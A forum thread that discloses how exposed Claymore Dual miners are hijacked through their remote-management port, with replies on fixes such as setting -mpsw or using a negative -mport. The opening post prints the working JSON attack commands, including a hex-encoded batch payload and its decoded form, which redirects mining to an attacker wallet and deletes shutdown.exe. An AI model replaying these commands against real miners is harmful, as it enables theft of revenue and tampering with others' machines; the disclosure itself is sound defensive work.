vuln

[anon4425]

There has been a huge intrusion in Claymores Dual cryptographic miner. I am posting this to all whom can possible bring attention to this matter and get it fixed this was originally sent to dwarfpool.com's

Hello, Our services detected a mass amount of commands being sent out from veracious IP Addresses. With two different commands being sent on port 3333, 80, 3001, 9001. After further research We discovered that the above ports are the most commonly used for remote management(With Claymores Dual Miner). The following are that where commands sent out.

We believe this is the initial(first) command sent out via raw socket

{"id":0,"jsonrpc":"2.0","method":"miner_getstat1"}

We think they send this out to a vast amount of IP's in some sort of list that they made using a port scanner such as Zmap. After testing this out on our miners the miner will reply with a message containing statistic data(Hash rate GPU count, temps ECT) For the remote manager built into Claymores I am certain this is purely used to filter out miner IP's from a range of other services running on the same port.

This command is sent to any IP's that have been "Filtered" this is basically the vulnerability.

{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["reboot.bat","7374617274202f42202222204574684463724d696e657236342e657865202d65706f6f6c206574682d7573322e6477 617266706f6f6c2e636f6d3a38303038202d6577616c20307863333362353438443964656644383233463439304546393242394 344623734393263643837394146202d6d6f64652031202d6d706f72742033333333202d6d70737720613870636b4d515533490 d0a64656c202f46202f51204574684463724d696e657236342e6578650d0a64656c202f46202f5120636f6e6669672e7478740d0 a64656c202f46202f51207265626f6f742e6261740d0a64656c202f46202f5120433a5c57696e646f77735c53797374656d33325c73687574646f776e2e657865"]}

The data is plain text but it is simply been put through the hex format after reversing this it can be viewed as.

start /B "" EthDcrMiner64.exe -epool eth-us2.dwarfpool.com:8008 -ewal 0xc33b548D9defD823F490EF92B9CDb7492cd879AF -mode 1 -mport 3333 -mpsw a8pckMQU3I del /F /Q EthDcrMiner64.exe del /F /Q config.txt del /F /Q reboot.bat del /F /Q C:\Windows\System32\shutdown.exe

After looking into the Claymore miner. We discovered that this command will create a reboot.bat (A batch script for windows machines) on any machines that have remote management enabled.

This command is followed after the socket is closed and reconnected too. This will execute the above batch file effectively hijacking it to the "Hackers wallet address"

{"id":0,"jsonrpc":"2.0","method":"miner_reboot"}

We have tested this on two of our own rigs and it can be prevented easily by either closing the remote management port. Or by removing the -mport . Or by simply setting -mpsw

This is a huge vulnerability that can result in the lost revenue of Thousands of dollars a day and possibly the devaluation of ETH but it has a very simply fix.

I have attached a few text documents of all the miners i was able to find in less than 2 hours. Using a simple python script that i made in under 20 minutes.

If needed I believe I can filter the list further to all of the vulnerable miners.

We hope you can bring attention to this vulnerability and get it fixed

-Danny Flanders (0x2727DFfe8E31591bE3e7ebE7eA37A0D448432C4E) -mrfunnypickes@gmail.com Miners on port 3333.txt

[anon4425]

I will attach the scripts i wrought that i was able to get over 4GH/s on

[anon4425]

https://dwarfpool.com/eth/address?wallet=0xdbc8A253239c344942Cb89315A2eba75D2346250

This is the currant wallet of a hijacker

[bobcate]

Not a big deal, but it sure is a vulnerability. To prevent this, the command line option "-mport" can be used to control the monitoring/management behavior of the program's built-in remote manager. Also "-mpsw" is used to password protect the remote manager.

Now I understand what RTFM actually means...

[anon4425]

I did not forget to read the manual in fact i clearly specified that this could be fixed with out a software update here "We have tested this on two of our own rigs and it can be prevented easily by either closing the remote management port. Or by removing the -mport . Or by simply setting -mpsw"

All i was trying to do was bring attention to the fact that ik of 500 miners that are actively getting hijacked. Because the owners failed to set a password after they enabled remote management. Yes it is technically their fault. Although Claymore should have made it so that if -mport is declared there has to be a password set. Either by making it stay in read-only mode or by preventing the miner from runing to get the operators attention.

But when over 10 coins where outright stolen from miners. Dont you think that the developer should fix it. Me being a software engineer i can tell you that this is a simple fix that could easily be integrated into the next iteration of the program

BTW here are the wallets i have seen being used to hijack miners https://dwarfpool.com/eth/address?wallet=0xc33b548D9defD823F490EF92B9CDb7492cd879AF https://dwarfpool.com/eth/address?wallet=0x7a4F522BA8d420e66539De7d0439dE6600B397E7 https://dwarfpool.com/eth/address?wallet=0xdbc8A253239c344942Cb89315A2eba75D2346250 https://dwarfpool.com/eth/address?wallet=0x6bc813919b92b65f062b8f8aa7ed28c13af451d7

I can provide proof but it is pretty clear they are used for illegitimate activity's only. I will post the latest wallet that is actively being used to hijack miners once i pull the latest configs off some of the vulnerable miners.

The hash rate floats between 1-2GH/s and the most i have seen it at is around 4GH/s keep in mind i mine ETH with $6000 worth of hardware and i have Bios modded my cards and undervolted and i get about 500MH/s so these "Hackers" are hijacking $12000-48000 worth of mining equipment with a grand total cost to them of about $5 for a cheap VPS witch they can use to send the JSON commands to the miners and also scan for new ones.

So maybe you should pay a little more attention and read before responding

[bobcate]

What's with the attitude? Sorry I missed the part where you stated what I thought you didn't state.

[Roaders]

Yeah, I was wondering what the overly aggressive attitude was for

[nelenel]

i just hope the commands actually work, because i've been trying to increase the intensity of the miner and so far the -ethi command (specified in the readme) does jack shit. If that command does nothing, who knows what other commands also do nothing.

In this case, if -mport didn't work, then this is a huge problem, because you'd be vulnerable when you think you're not.

[anon4425]

The commands should be working just make sure your flags are being called. (-mport) just because they are inside the config.txt does not mean. They are bing declared. Check your .bat to make sure it calls the correct configuration file or you can simple enter your configuration after the EthDcr64.exe above in my original post is an example.

[burkeblazer87]

• You can use a negative port e.g. -3333 this tells the app to only allow getting statistics on port 3333
• You can port forward port 3333 to something not as obvious in your firewall
• You can test to make sure it works by just going into your browser and going to localhost:3333

[Arinerron]

Is this vulnerability actually fixed, or does it still exist? It would be a super simple patch.